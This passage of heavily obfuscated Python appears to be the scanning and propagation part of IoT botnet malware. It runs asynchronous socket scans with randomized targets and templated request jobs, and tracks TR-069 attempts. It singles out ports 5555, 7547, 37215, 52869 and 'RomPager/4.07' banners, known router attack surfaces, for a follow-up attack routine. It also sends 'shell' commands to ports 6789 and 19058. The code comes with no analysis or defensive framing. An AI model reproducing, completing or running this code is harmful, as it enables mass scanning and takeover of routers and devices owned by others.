   request = re . sub ( '%%RAND16A%%' , '%d' % ( random . uniform ( 10000 , 65535 ) ) , request )
8070
  if '%%RAND16B%%' in request :
8071
   request = re . sub ( '%%RAND16B%%' , '%d' % ( random . uniform ( 10000 , 65535 ) ) , request )
8072
   if 75 - 75: oOOo0000o . OOOoOooO % oOOo0000o * o0ooO
8073
 I11i1I = hash ( O0OOo00o00o )
8074
 O0ooOOo0o . append ( O0OOo00o00o )
8075
 OOi11i11IIii11 [ I11i1I ] = ( targetip , int ( targetport ) , request )
8076
 oOOoOoO [ I11i1I ] = 0
8077
 Oo0OoOOoo00o [ I11i1I ] = request
8078
 iIiiiIIIII1i1 [ I11i1I ] = ''
8079
 I11Ii11iiiii1 [ I11i1I ] = time . time ( )
8080
 I11IO0O00o0 [ I11i1I ] = jobhash
8081
 ooOOoooOo [ jobhash ] = O0OOo00o00o
8082
 iI1I1IiI1II1 [ jobhash ] = ''
8083
 return O0OOo00o00o
8084
 if 39 - 39: Oo0Oo / Oooo
8085
def i1I11i1I111 ( webhash ) :
8086
 global i11iiiIi
8087
 if 25 - 25: IIiII + O0oo / Ii11i1iIi
8088
 if i11iiiIi :
8089
  Ii111i11iIi ( "%s:%d TR:%s" % ( i1iI [ webhash ] [ 0 ] , i1iI [ webhash ] [ 1 ] , iI1I1IiI1II1 [ webhash ] ) )
8090
  if 26 - 26: OOooOO0
8091
 oOOOOOO0OO0 [ webhash ] = None
8092
 i1iI [ webhash ] = None
8093
 iI1IIi [ webhash ] = None
8094
 ooOOoooOo [ webhash ] = None
8095
 iI1I1IiI1II1 [ webhash ] = None
8096
 iii11II1I1I . remove ( webhash )
8097
 if 10 - 10: O0oo0OOOOO00 * i1 + Ii11i1iIi
8098
def IIii1i1i ( sock ) :
8099
 global tr69client_maxattempts
8100
 global i1iii1I11
8101
 global o0iIiI1Ii1Ii
8102
 if 71 - 71: oOOoO00oo0
8103
 I11i1I = hash ( sock )
8104
 iiIii1I1i1 = I11IO0O00o0 [ I11i1I ]
8105
 if 3 - 3: i1IIi1i1iiI * Ii11i1iIi . O0oo0OOOOO00 % OOOoOooO + o0oooooO + OOooOO0
8106
 try :
8107
  sock . close ( )
8108
 except :
8109
  pass
8110
  if 74 - 74: I11I1Ii + Ii11i1iIi % oOoO0Ooo % OOooOO0
8111
 OOoOoooOo0 = 0
8112
 if 29 - 29: Ii11i1iIi
8113
 iI1I1IiI1II1 [ iiIii1I1i1 ] = '' ;
8114
 try :
8115
  iI1I1IiI1II1 [ iiIii1I1i1 ] = iIiiiIIIII1i1 [ I11i1I ] . split ( '\n' ) [ 0 ] . strip ( )
8116
 except :
8117
  pass
8118
  if 44 - 44: oOOo0000o
8119
 oOOOOOO0OO0 [ iiIii1I1i1 ] += 1
8120
 if 9 - 9: i1IIi1i1iiI . Oo0 + IIiIIiIii1I
8121
 if 99 - 99: Oooo . OOooOO0 * IIiII
8122
 if 63 - 63: Ii11i1iIi
8123
 Iioo0OooOoO = time . time ( )
8124
 if iI1IIi [ iiIii1I1i1 ] <= Iioo0OooOoO :
8125
  iI1IIi [ iiIii1I1i1 ] = time . time ( ) + i1iii1I11
8126
 ooOOoooOo [ iiIii1I1i1 ] = None
8127
 if 83 - 83: IIiII . Ii11i1iIi
8128
 O0ooOOo0o . remove ( sock )
8129
 OOi11i11IIii11 [ I11i1I ] = None
8130
 oOOoOoO [ I11i1I ] = None
8131
 Oo0OoOOoo00o [ I11i1I ] = None
8132
 iIiiiIIIII1i1 [ I11i1I ] = None
8133
 I11Ii11iiiii1 [ I11i1I ] = None
8134
 I11IO0O00o0 [ I11i1I ] = None
8135
 if 41 - 41: I11I1Ii * Oo0Oo % oOOo0000o + O0oo0OOOOO00 * i1 % O0oo
8136
def oOOoOO ( ) :
8137
 global o0o0000o00o
8138
 if 11 - 11: oOoO0Ooo + oOoO0Ooo
8139
 Iioo0OooOoO = time . time ( )
8140
 OO00ooo0 = iii11II1I1I
8141
 for IIIiiiI in OO00ooo0 :
8142
  iiIii1I1i1 = hash ( IIIiiiI )
8143
  if 29 - 29: Ii11i1iIi * o0oooooO % Ii % oOOoO00oo0 / Oo0 . IIiIii1iI
8144
  if ooOOoooOo [ iiIii1I1i1 ] == None :
8145
   if 9 - 9: IIiII + o0oooooO * Ii11i1iIi * IIiIii1iI
8146
   if oOOOOOO0OO0 [ iiIii1I1i1 ] >= len ( o0o0000o00o ) :
8147
    if 84 - 84: i1IIi1i1iiI % i1
8148
    i1I11i1I111 ( iiIii1I1i1 )
8149
    continue
8150
    if 66 - 66: Ii
8151
    if 49 - 49: i1
8152
   if Iioo0OooOoO >= iI1IIi [ iiIii1I1i1 ] :
8153
    if 8 - 8: I11I1Ii * IIiIii1iI . i1IIi1i1iiI . Oo0 + Oo0Oo
8154
    O0OOo00o00o = iiiO0O000OoO0 ( i1iI [ iiIii1I1i1 ] [ 0 ] , i1iI [ iiIii1I1i1 ] [ 1 ] , OOo0OooO00 ( i1iI [ iiIii1I1i1 ] [ 1 ] , oOOOOOO0OO0 [ iiIii1I1i1 ] ) , iiIii1I1i1 )
8155
    ooOOoooOo [ iiIii1I1i1 ] = O0OOo00o00o
8156
    iI1IIi [ iiIii1I1i1 ] = 0
8157
    if 35 - 35: I11I1Ii . IIiIIiIii1I + O0oo + O0oo - i1 . o0oooooO
8158
    if 1 - 1: OOOoOooO
8159
def o000oooOOo ( sock , webhash , jobhash ) :
8160
 try :
8161
  if 14 - 14: Ii - i1IIi1i1iiI * O0oo + Oooo % o0ooO
8162
  sock . send ( Oo0OoOOoo00o [ webhash ] )
8163
 except :
8164
  pass
8165
  if 20 - 20: Oo0 / O0oo
8166
 return 1
8167
 if 13 - 13: I11I1Ii - Oo0Oo % O0oo + Ii11i1iIi + IIiIIiIii1I % O0oo
8168
def Ooo0OO ( ) :
8169
 global o0iIiI1Ii1Ii
8170
 global tr69client_maxconnectiontime_payload
8171
 if 65 - 65: Oo0Oo * Oo0 . oOOo0000o . Ii - oOoO0Ooo - Oo0Oo
8172
 Iioo0OooOoO = time . time ( )
8173
 if 77 - 77: i1 . i1IIi1i1iiI . o0oooooO % o0ooO
8174
 if 1 - 1: I11I1Ii
8175
 O00Oo = 0.01
8176
 IIiI1i , O0o0 , IiIIiI11I = select . select ( O0ooOOo0o , O0ooOOo0o , [ ] , O00Oo )
8177
 for O0O0 in O0ooOOo0o :
8178
  I11i1I = hash ( O0O0 )
8179
  o0oo0OOOo = O0O0 . getsockopt ( socket . SOL_SOCKET , socket . SO_ERROR )
8180
  if o0oo0OOOo != 0 :
8181
   if 30 - 30: oOoO0Ooo - oOOo0000o / IIiIii1iI . O0oo0OOOOO00
8182
   if iIiiiIIIII1i1 [ I11i1I ] == '' :
8183
    iIiiiIIIII1i1 [ I11i1I ] = '(timeout)' ;
8184
   IIii1i1i ( O0O0 )
8185
   continue
8186
  if O0O0 in IIiI1i :
8187
   O0 = ''
8188
   try :
8189
    O0 = O0O0 . recv ( 2048 )
8190
   except :
8191
    pass
8192
   if O0 :
8193
    iIiiiIIIII1i1 [ I11i1I ] += O0
8194
    if 43 - 43: IIiII - i1IIi1i1iiI % Oo0Oo / I11I1Ii / oOOoO00oo0
8195
    if 6 - 6: IIiIii1iI . i1 + I11I1Ii / IIiIIiIii1I
8196
    if 90 - 90: o0ooO + Oo0 - OOOoOooO / i1IIi1i1iiI
8197
    if 78 - 78: o0ooO / I11I1Ii . IIiII * O0oo0OOOOO00
8198
    i1iIII = iIiiiIIIII1i1 [ I11i1I ] . find ( '\r\n\r\n' )
8199
    if i1iIII >= 0 :
8200
     i1iIII += 4
8201
    else :
8202
     i1iIII = iIiiiIIIII1i1 [ I11i1I ] . find ( '\n\n' )
8203
     if i1iIII >= 0 :
8204
      i1iIII += 2
8205
      if 76 - 76: I11I1Ii - IIiIii1iI + O0oo % o0oooooO . I11I1Ii
8206
    if i1iIII >= 0 :
8207
     if 32 - 32: o0oooooO + o0oooooO % Oooo
8208
     Oo00oO0O = re . search ( 'Content-Length:\s*(\d+)' , iIiiiIIIII1i1 [ I11i1I ] )
8209
     if Oo00oO0O :
8210
      Oo00Ooo0O0Oo = int ( Oo00oO0O . group ( 1 ) )
8211
      if 98 - 98: oOoO0Ooo * Ii11i1iIi % i1 - o0oooooO + O0oo0OOOOO00
8212
      if 13 - 13: O0oo0OOOOO00 . Ii * IIiII - oOOo0000o - oOOoO00oo0 / O0oo0OOOOO00
8213
      if 40 - 40: i1IIi1i1iiI / O0oo0OOOOO00 . OOooOO0
8214
      if 25 - 25: oOOoO00oo0 * Oooo . oOOo0000o + oOOoO00oo0 - Ii11i1iIi
8215
      if len ( iIiiiIIIII1i1 [ I11i1I ] ) - i1iIII == Oo00Ooo0O0Oo :
8216
       if 51 - 51: Ii11i1iIi . I11I1Ii * IIiII / o0oooooO * O0oo0OOOOO00 / Oooo
8217
       IIii1i1i ( O0O0 )
8218
       continue
8219
       if 42 - 42: Oo0Oo - IIiIIiIii1I - Ii / i1
8220
       if 45 - 45: oOOoO00oo0
8221
   else :
8222
    IIii1i1i ( O0O0 )
8223
    continue
8224
  if O0O0 in O0o0 :
8225
   if oOOoOoO [ I11i1I ] == 0 :
8226
    if 58 - 58: oOoO0Ooo * IIiII . Ii / O0oo / oOOoO00oo0
8227
    iiIii1I1i1 = I11IO0O00o0 [ I11i1I ]
8228
    o000oooOOo ( O0O0 , I11i1I , iiIii1I1i1 )
8229
    oOOoOoO [ I11i1I ] = 1
8230
    if 87 - 87: OOOoOooO . Ii + i1IIi1i1iiI % I11I1Ii - O0oo
8231
  OoO0oOoooo = o0iIiI1Ii1Ii
8232
  iiIii1I1i1 = I11IO0O00o0 [ I11i1I ]
8233
  if Iioo0OooOoO - I11Ii11iiiii1 [ I11i1I ] > OoO0oOoooo :
8234
   if 33 - 33: oOoO0Ooo / I11I1Ii * o0oooooO * o0oooooO * i1 / IIiII
8235
   if iIiiiIIIII1i1 [ I11i1I ] == '' :
8236
    iIiiiIIIII1i1 [ I11i1I ] = '(timeout)' ;
8237
   IIii1i1i ( O0O0 )
8238
   continue
8239
   if 26 - 26: oOOo0000o / O0oo0OOOOO00 - oOOoO00oo0 - Ii
8240
   if 45 - 45: O0oo0OOOOO00
8241
   if 64 - 64: oOOoO00oo0 * Ii
8242
   if 93 - 93: OOOoOooO
8243
   if 57 - 57: Oooo + OOOoOooO / IIiIii1iI
8244
O0O = "SPLTX"
8245
if 70 - 70: IIiII / Oo0Oo
8246
if 19 - 19: o0ooO % I11I1Ii / Oo0 % IIiIii1iI * Oo0 + OOOoOooO
8247
if 61 - 61: Ii
8248
if 95 - 95: o0ooO / i1IIi1i1iiI . OOOoOooO - O0oo0OOOOO00 / Ii11i1iIi - o0oooooO
8249
O0i1 = { }
8250
OoOOOOo00 = [ ]
8251
I1Iii1i1Ii = [ ]
8252
IIiiI111iii = { }
8253
if 9 - 9: i1IIi1i1iiI / IIiIii1iI - Oooo % o0oooooO / i1 - oOoO0Ooo
8254
def O00000O ( ip , port ) :
8255
 global O0i1
8256
 global OoOOOOo00
8257
 global IIiiI111iii
8258
 global I1Iii1i1Ii
8259
 if 14 - 14: I11I1Ii
8260
 if port > 0 :
8261
  O00000O ( ip , 0 )
8262
 O0O0iIiIIIIiiII1I = hash ( ( ip , port ) )
8263
 if O0O0iIiIIIIiiII1I in IIiiI111iii :
8264
  return
8265
 IIiiI111iii [ O0O0iIiIIIIiiII1I ] = 1
8266
 if not port in OoOOOOo00 :
8267
  OoOOOOo00 . append ( port )
8268
 if not port in O0i1 or O0i1 [ port ] == None :
8269
  O0i1 [ port ] = 0
8270
 if port :
8271
  i1II1 = "%s:%d" % ( ip , port )
8272
  if not i1II1 in I1Iii1i1Ii :
8273
   I1Iii1i1Ii . append ( i1II1 )
8274
 O0i1 [ port ] += 1
8275
 if 37 - 37: Oo0Oo % OOooOO0 . o0oooooO - Oooo
8276
def III1iiIiiI ( ) :
8277
 global O0i1
8278
 global OoOOOOo00
8279
 global IIiiI111iii
8280
 global I1Iii1i1Ii
8281
 oOOo0OO = 'INPST:'
8282
 for Ooo0o0oOO0o in OoOOOOo00 :
8283
  oOOo0OO += ' %d:%d' % ( Ooo0o0oOO0o , O0i1 [ Ooo0o0oOO0o ] )
8284
 return oOOo0OO
8285
 if 9 - 9: i1IIi1i1iiI % Oooo + oOOo0000o - OOooOO0
8286
def iIiiiiii1III1 ( ) :
8287
 global O0i1
8288
 global OoOOOOo00
8289
 global IIiiI111iii
8290
 global I1Iii1i1Ii
8291
 oOOo0OO = 'INPSI:'
8292
 for i1II1 in I1Iii1i1Ii :
8293
  oOOo0OO += ' %s' % i1II1
8294
 return oOOo0OO
8295
 if 63 - 63: Oooo * OOooOO0
8296
def iiOo0000O ( ) :
8297
 global O0i1
8298
 global OoOOOOo00
8299
 global IIiiI111iii
8300
 global I1Iii1i1Ii
8301
 O0i1 = { }
8302
 OoOOOOo00 = [ ]
8303
 I1Iii1i1Ii = [ ]
8304
 IIiiI111iii = { }
8305
 if 66 - 66: Oooo / Ii11i1iIi
8306
 if 57 - 57: O0oo . I11I1Ii / Oooo + oOOo0000o
8307
 if 59 - 59: Ii * Oo0Oo * IIiII * oOOoO00oo0
8308
def oooOoO0 ( job ) :
8309
 o0O0o00O = job [ 0 ]
8310
 iIi11 = len ( Oo0Oooo )
8311
 if 48 - 48: O0oo0OOOOO00 + oOoO0Ooo % O0oo . Oooo
8312
 if iIi11 == 0 :
8313
  Oo0Oooo . append ( job )
8314
  return
8315
 if Oo0Oooo [ 0 ] [ 0 ] < o0O0o00O :
8316
  Oo0Oooo . insert ( 0 , job )
8317
  return
8318
 if Oo0Oooo [ iIi11 - 1 ] [ 0 ] > o0O0o00O :
8319
  Oo0Oooo . append ( job )
8320
  return
8321
  if 86 - 86: o0oooooO * oOOo0000o % oOOo0000o
8322
 iii1 = 0
8323
 oo00o = iIi11 - 1
8324
 while True :
8325
  if oo00o - iii1 <= 1 :
8326
   if Oo0Oooo [ iii1 ] [ 0 ] > o0O0o00O :
8327
    Oo0Oooo . insert ( oo00o , job )
8328
    return
8329
   Oo0Oooo . insert ( iii1 , job )
8330
   return
8331
  o00OO0o0 = int ( ( iii1 + oo00o ) / 2 )
8332
  if Oo0Oooo [ o00OO0o0 ] [ 0 ] > o0O0o00O :
8333
   iii1 = o00OO0o0
8334
  else :
8335
   if Oo0Oooo [ o00OO0o0 ] [ 0 ] == o0O0o00O :
8336
    Oo0Oooo . insert ( o00OO0o0 , job )
8337
    return
8338
   oo00o = o00OO0o0
8339
   if 8 - 8: IIiIIiIii1I + i1IIi1i1iiI / Oo0Oo * IIiIii1iI . Ii
8340
   if 54 - 54: oOoO0Ooo . OOOoOooO / oOOo0000o * Oooo
8341
def III111I1 ( timeval ) :
8342
 oOOoooo00o = [ ]
8343
 while len ( Oo0Oooo ) > 0 and Oo0Oooo [ len ( Oo0Oooo ) - 1 ] [ 0 ] <= timeval :
8344
  oOOoooo00o . append ( Oo0Oooo . pop ( ) )
8345
 return oOOoooo00o
8346
 if 57 - 57: OOooOO0
8347
def iIiI1III11 ( ) :
8348
 for O0OooO0Oo0O in range ( len ( Oo0Oooo ) - 1 ) :
8349
  if Oo0Oooo [ O0OooO0Oo0O ] [ 0 ] < Oo0Oooo [ O0OooO0Oo0O + 1 ] [ 0 ] :
8350
   return 1
8351
 return 0
8352
 if 63 - 63: O0oo . Oo0
8353
def iII1I1I ( ip , port ) :
8354
 global I1i1
8355
 if 88 - 88: oOOoO00oo0 - Ii / Oooo - i1 - oOoO0Ooo
8356
 if 88 - 88: i1IIi1i1iiI
8357
 global O0o0O0O0oOo0O
8358
 if ip == O0o0O0O0oOo0O :
8359
  return
8360
  if 71 - 71: IIiIIiIii1I + OOooOO0 . IIiII
8361
  if 69 - 69: IIiII + Ii11i1iIi * OOooOO0 % i1 + oOOo0000o
8362
 o000oO0ooO = o0o * len ( oOiI1iIiIi111 ) + I1i1
8363
 if 14 - 14: OOOoOooO / OOooOO0 . oOOoO00oo0 . OOooOO0 * Ii11i1iIi
8364
 if len ( ii1o00 ) >= o000oO0ooO :
8365
  if 55 - 55: IIiIIiIii1I . Ii11i1iIi % Ii11i1iIi - oOOoO00oo0 . Oo0
8366
  ooo000oO = int ( len ( ii1o00 ) / o000oO0ooO ) + 1
8367
  o000oO0ooO = 0
8368
  for O000Oo0O0Oo0 in range ( o0o ) :
8369
   for oo0OOOo00oOOO0OO in oOiI1iIiIi111 :
8370
    ii1o00 . insert ( o000oO0ooO , "%s:%d" % ( ip , oo0OOOo00oOOO0OO ) )
8371
    if 48 - 48: o0ooO
8372
    o000oO0ooO += ooo000oO
8373
  for OO0Oo in range ( I1i1 ) :
8374
   ii1o00 . insert ( o000oO0ooO , "%s:%d" % ( ip , random . randint ( 1 , 65535 ) ) )
8375
   o000oO0ooO += ooo000oO
8376
 else :
8377
  for OO0Oo in range ( I1i1 ) :
8378
   ii1o00 . insert ( 0 , "%s:%d" % ( ip , random . randint ( 1 , 65535 ) ) )
8379
  for O000Oo0O0Oo0 in range ( o0o ) :
8380
   for oo0OOOo00oOOO0OO in oOiI1iIiIi111 :
8381
    ii1o00 . insert ( 0 , "%s:%d" % ( ip , oo0OOOo00oOOO0OO ) )
8382
    if 67 - 67: oOOoO00oo0 % OOooOO0 - OOOoOooO / I11I1Ii
8383
def IIii1IIi1I ( ip , scanport ) :
8384
 if 27 - 27: Oo0 + IIiII - oOOo0000o
8385
 global O0o0O0O0oOo0O
8386
 if ip == O0o0O0O0oOo0O :
8387
  Ii111i11iIi ( 'NOTC: Ignoring sentinel IP %s' % ( O0o0O0O0oOo0O ) )
8388
  return
8389
  if 26 - 26: O0oo0OOOOO00 - OOooOO0
8390
  if 26 - 26: O0oo / i1 % Ii11i1iIi + i1
8391
 o000oO0ooO = o0o * len ( oOiI1iIiIi111 )
8392
 if 95 - 95: OOooOO0 % IIiIIiIii1I - i1IIi1i1iiI * oOOo0000o / OOOoOooO
8393
 if len ( ii1o00 ) >= o000oO0ooO :
8394
  if 79 - 79: I11I1Ii % O0oo0OOOOO00 / o0oooooO + i1IIi1i1iiI + o0oooooO + OOOoOooO
8395
  ooo000oO = int ( len ( ii1o00 ) / o000oO0ooO ) + 1
8396
  o000oO0ooO = 0
8397
  ii1o00 . insert ( o000oO0ooO , "%s:%d" % ( ip , scanport ) )
8398
  if 61 - 61: oOoO0Ooo % IIiIii1iI % oOOo0000o * oOOoO00oo0 . Ii - Ii11i1iIi
8399
  o000oO0ooO += ooo000oO
8400
 else :
8401
  if 12 - 12: o0ooO % i1 / oOOoO00oo0
8402
  if 41 - 41: O0oo0OOOOO00 / IIiIii1iI * IIiII / O0oo0OOOOO00 + oOOoO00oo0 - i1IIi1i1iiI
8403
  ii1o00 . insert ( 0 , "%s:%d" % ( ip , scanport ) )
8404
  if 45 - 45: oOoO0Ooo . oOoO0Ooo * i1 * IIiII * Oo0Oo
8405
def oo0OO0ooo0 ( ) :
8406
 if not i1iii :
8407
  return
8408
  if 80 - 80: Ii11i1iIi - IIiIii1iI * OOooOO0 * IIiIIiIii1I
8409
 if len ( ii1o00 ) > 0 :
8410
  IIiiIIIiIi1I = ii1o00 . pop ( ) ;
8411
  Ii1iiIi = IIiiIIIiIi1I . split ( ':' )
8412
  iiIi1I1 = hash ( IIiiIIIiIi1I )
8413
  if iiIi1I1 in oO0iIiiiii1 :
8414
   if 75 - 75: oOOoO00oo0 + Oo0Oo + oOOoO00oo0 % IIiIii1iI
8415
   return
8416
  oO0O0O = ( Ii1iiIi [ 0 ] , int ( Ii1iiIi [ 1 ] ) )
8417
  if 51 - 51: O0oo . Ii * o0oooooO
8418
  O0OOo00o00o = socket . socket ( socket . AF_INET , socket . SOCK_STREAM )
8419
  O0OOo00o00o . setblocking ( 0 )
8420
  i1I1I11iii1i = hash ( O0OOo00o00o )
8421
  O000O0o0oOOo [ i1I1I11iii1i ] = time . time ( )
8422
  try :
8423
   O0OOo00o00o . connect ( oO0O0O )
8424
  except :
8425
   pass
8426
  o0o0oOOo . append ( O0OOo00o00o )
8427
  i11I11III1iii [ i1I1I11iii1i ] = IIiiIIIiIi1I
8428
  if 39 - 39: I11I1Ii . oOOo0000o / IIiIii1iI % oOOo0000o
8429
def i111 ( scansock ) :
8430
 global oOI11IIIi1II111
8431
 global I1i
8432
 global Oo0O00OOooO
8433
 global IiiI1
8434
 global OO00oo0o
8435
 global OOoOo00oO0
8436
 global iIii1IiI11II1
8437
 if 39 - 39: o0oooooO . oOoO0Ooo / I11I1Ii / IIiIIiIii1I
8438
 try :
8439
  scansock . close ( )
8440
 except :
8441
  pass
8442
 o0o0oOOo . remove ( scansock )
8443
 i1I1I11iii1i = hash ( scansock )
8444
 if 5 - 5: OOooOO0 * oOOoO00oo0 . IIiII - Ii11i1iIi
8445
 if i1I1I11iii1i in O0OO0O00000 and not O0OO0O00000 [ i1I1I11iii1i ] == None :
8446
  if 92 - 92: oOOoO00oo0 . O0oo * Oo0Oo * o0oooooO
8447
  if 63 - 63: I11I1Ii + oOOo0000o / I11I1Ii * i1 * IIiIii1iI
8448
  if 20 - 20: I11I1Ii
8449
  if i1I1I11iii1i in i1II and not i1II [ i1I1I11iii1i ] == None and len ( i1II [ i1I1I11iii1i ] ) > 2 :
8450
   iiIIiI1I = re . sub ( '^!' , '' , i1II [ i1I1I11iii1i ] )
8451
   iiIIiI1I = re . sub ( '\s\s+' , ' ' , iiIIiI1I )
8452
   if i1I1I11iii1i in OooO and not OooO [ i1I1I11iii1i ] == None :
8453
    if oOI11IIIi1II111 :
8454
     if I1i :
8455
      Ii111i11iIi ( "%s SD:%s:%s" % ( i11I11III1iii [ i1I1I11iii1i ] , OooO [ i1I1I11iii1i ] , iiIIiI1I [ : 32 ] ) )
8456
     else :
8457
      Ii111i11iIi ( "%s SD:%s:%s" % ( i11I11III1iii [ i1I1I11iii1i ] , OooO [ i1I1I11iii1i ] , iiIIiI1I [ : 2560 ] ) )
8458
   else :
8459
    if 93 - 93: o0oooooO % oOOoO00oo0 * OOOoOooO . i1IIi1i1iiI * O0oo
8460
    Iii1 = i11I11III1iii [ i1I1I11iii1i ] . split ( ':' )
8461
    O0Ooo0 = Iii1 [ 0 ]
8462
    oo000Oo = int ( Iii1 [ 1 ] )
8463
    if IiiI1 or oo000Oo in iIii1IiI11II1 :
8464
     Ii111i11iIi ( "%s SR:%s" % ( i11I11III1iii [ i1I1I11iii1i ] , iiIIiI1I [ : 512 ] ) )
8465
     if 76 - 76: Ii - I11I1Ii * OOooOO0 . IIiIIiIii1I
8466
    if 'HTTP/' in iiIIiI1I [ : 5 ] :
8467
     if 33 - 33: IIiII % IIiII * OOOoOooO
8468
     if OO00oo0o :
8469
      oOo0OOO0000 ( O0Ooo0 , oo000Oo , O0Ooo0 + '%%%' + 'PORT:%d:' % ( oo000Oo ) + iiIIiI1I [ : 1024 ] )
8470
      if oo000Oo == 5555 or oo000Oo == 7547 or oo000Oo == 37215 or oo000Oo == 52869 or 'Server: RomPager/4.07 UPnP/1.0' in iiIIiI1I :
8471
       if 54 - 54: o0oooooO . o0ooO . Oo0Oo - IIiIIiIii1I
8472
       O0iII111i1 ( O0Ooo0 , oo000Oo )
8473
    else :
8474
     if 86 - 86: Oo0 * I11I1Ii - o0ooO + i1IIi1i1iiI
8475
     if oo000Oo == 37215 or oo000Oo == 52869 :
8476
      O0iII111i1 ( O0Ooo0 , oo000Oo )
8477
      if 85 - 85: OOooOO0 / oOOo0000o / Ii
8478
     if OOoOo00oO0 :
8479
      if oo000Oo != 6789 and oo000Oo != 19058 and oo000Oo != 37215 and oo000Oo != 52869 :
8480
       if 89 - 89: o0oooooO . Oo0Oo / oOoO0Ooo - o0ooO + o0ooO . oOOo0000o
8481
       if not 'SSH' in iiIIiI1I [ : 10 ] and not ( 'FTP' in iiIIiI1I and '220' in iiIIiI1I ) and not "RFB 004" in iiIIiI1I and not "220-FileZilla" in iiIIiI1I :
8482
        if 56 - 56: oOoO0Ooo / Ii11i1iIi . OOOoOooO
8483
        OoO00Ooo0OoOo0O0Oo ( O0Ooo0 , oo000Oo , 'PORT:%d:' % ( oo000Oo ) + iiIIiI1I [ : 512 ] )
8484
        if 80 - 80: OOOoOooO - OOOoOooO
8485
        if 65 - 65: OOOoOooO % Oooo . Oo0Oo % Oooo + Oooo
8486
   i1i1I1i1 = i11I11III1iii [ i1I1I11iii1i ] . split ( ':' )
8487
   if hash ( i1i1I1i1 [ 0 ] ) in oO0OoOoO00OoO :
8488
    IiIIiI1iII1Ii . append ( i1i1I1i1 )
8489
  else :
8490
   if Oo0O00OOooO :
8491
    Ii111i11iIi ( "%s SO" % ( i11I11III1iii [ i1I1I11iii1i ] ) )
8492
    if 42 - 42: O0oo0OOOOO00 * o0ooO + Ii
8493
   i1i1I1i1 = i11I11III1iii [ i1I1I11iii1i ] . split ( ':' )
8494
   Oo0oOOooO0 = i1i1I1i1 [ 0 ]
8495
   iII111iI = int ( i1i1I1i1 [ 1 ] )
8496
   if not iII111iI in OoooOoo0 :
8497
    iIi11II1i = hash ( Oo0oOOooO0 )
8498
    if not iIi11II1i in oO0OoOoO00OoO or oO0OoOoO00OoO [ iIi11II1i ] == None :
8499
     oO0OoOoO00OoO [ iIi11II1i ] = 1
8500
     Iioo0OooOoO = time . time ( )
8501
     for O00OoOoOOoO0 in iIoO0O000oo :
8502
      OoOo = Iioo0OooOoO + O00OoOoOOoO0 * 60
8503
      o0ooo0 = ( OoOo , Oo0oOOooO0 , iII111iI )
8504
      if 66 - 66: oOOoO00oo0 - OOooOO0 / OOOoOooO / i1IIi1i1iiI % Oo0
8505
      oooOoO0 ( o0ooo0 )
8506
      if 14 - 14: oOOo0000o . IIiII
8507
      if 6 - 6: i1IIi1i1iiI % oOOoO00oo0 + i1IIi1i1iiI
8508
 O000O0o0oOOo [ i1I1I11iii1i ] = None
8509
 i11I11III1iii [ i1I1I11iii1i ] = None
8510
 O0OO0O00000 [ i1I1I11iii1i ] = None
8511
 i1II [ i1I1I11iii1i ] = None
8512
 OooO [ i1I1I11iii1i ] = None
8513
 if 5 - 5: IIiIIiIii1I
8514
 if 49 - 49: oOOoO00oo0
8515
def O0oOoo0000 ( ) :
8516
 global I1i11II
8517
 global O0OoO0O
8518
 Iioo0OooOoO = time . time ( )
8519
 IiiIIIiiI1 = o0o0oOOo
8520
 i1IIOO0OOoO00OO = 0
8521
 IIiI1i , O0o0 , IiIIiI11I = select . select ( [ ] , IiiIIIiiI1 , [ ] , 0.01 )
8522
 for IiI1iIIiI1I in IiiIIIiiI1 :
8523
  i1I1I11iii1i = hash ( IiI1iIIiI1I )
8524
  o0oo0OOOo = IiI1iIIiI1I . getsockopt ( socket . SOL_SOCKET , socket . SO_ERROR )
8525
  if o0oo0OOOo != 0 :
8526
   if 90 - 90: IIiII
8527
   i111 ( IiI1iIIiI1I )
8528
   continue
8529
  i1IIOO0OOoO00OO = 1
8530
  if IiI1iIIiI1I in O0o0 :
8531
   if 2 - 2: o0oooooO
8532
   if not i1I1I11iii1i in O0OO0O00000 or O0OO0O00000 [ i1I1I11iii1i ] == None :
8533
    if 45 - 45: IIiII * IIiIIiIii1I + IIiII
8534
    if 83 - 83: IIiIii1iI + OOOoOooO - oOOo0000o
8535
    try :
8536
     IiI1iIIiI1I . send ( "" ) ;
8537
    except :
8538
     if 57 - 57: i1IIi1i1iiI
8539
     if 24 - 24: oOOoO00oo0 . oOOoO00oo0 % IIiII - IIiIIiIii1I
8540
     i111 ( IiI1iIIiI1I )
8541
     continue
8542
     if 85 - 85: o0ooO * IIiII
8543
    O0OO0O00000 [ i1I1I11iii1i ] = 1
8544
    if 82 - 82: IIiIIiIii1I - OOooOO0 + i1 / O0oo0OOOOO00
8545
    Ii1i1i11I11Ii = i11I11III1iii [ i1I1I11iii1i ] . split ( ':' ) ;
8546
    o0oO0o0ooo00 = Ii1i1i11I11Ii [ 0 ] ;
8547
    O0OOOo0oOo = int ( Ii1i1i11I11Ii [ 1 ] ) ;
8548
    if 10 - 10: Oo0 . oOOoO00oo0 . oOOo0000o - OOOoOooO - i1IIi1i1iiI + IIiIii1iI
8549
    if 17 - 17: I11I1Ii - Oo0Oo / IIiIIiIii1I + IIiIii1iI
8550
    if 58 - 58: Ii11i1iIi - OOooOO0 / IIiII / O0oo / O0oo
8551
    if 99 - 99: I11I1Ii
8552
    if 88 - 88: oOOoO00oo0 * Oooo
8553
    if 46 - 46: Ii11i1iIi
8554
    if 60 - 60: IIiIii1iI / OOOoOooO
8555
    if 78 - 78: o0oooooO
8556
    if 38 - 38: IIiII * IIiIii1iI . Ii - oOOo0000o
8557
    if 66 - 66: oOOo0000o
8558
    if 95 - 95: OOOoOooO + oOOoO00oo0 / oOOo0000o
8559
    if O0OOOo0oOo in OoooOoo0 :
8560
     if 83 - 83: Oooo / oOOo0000o
8561
     if 64 - 64: o0ooO % o0ooO / oOOo0000o * O0oo0OOOOO00 - i1IIi1i1iiI + IIiII
8562
     O0OO0O00000 [ i1I1I11iii1i ] = 2
8563
     try :
8564
      IiI1iIIiI1I . send ( 'GET / HTTP/1.1\r\nHost: %s\r\n\r\n' % ( o0oO0o0ooo00 ) )
8565
     except :
8566
      pass
8567
    elif O0OOOo0oOo == 6789 or O0OOOo0oOo == 19058 :
8568
     O0OO0O00000 [ i1I1I11iii1i ] = 2
8569
     try :
8570
      IiI1iIIiI1I . send ( 'shell\n' ) ;
8571
     except :
8572
      pass
8573
      if 55 - 55: I11I1Ii + IIiIIiIii1I + Ii11i1iIi + OOooOO0 % i1IIi1i1iiI
8574
      if 44 - 44: OOOoOooO % Oo0 - IIiIIiIii1I
8575
  O0 = ''
8576
  try :
8577
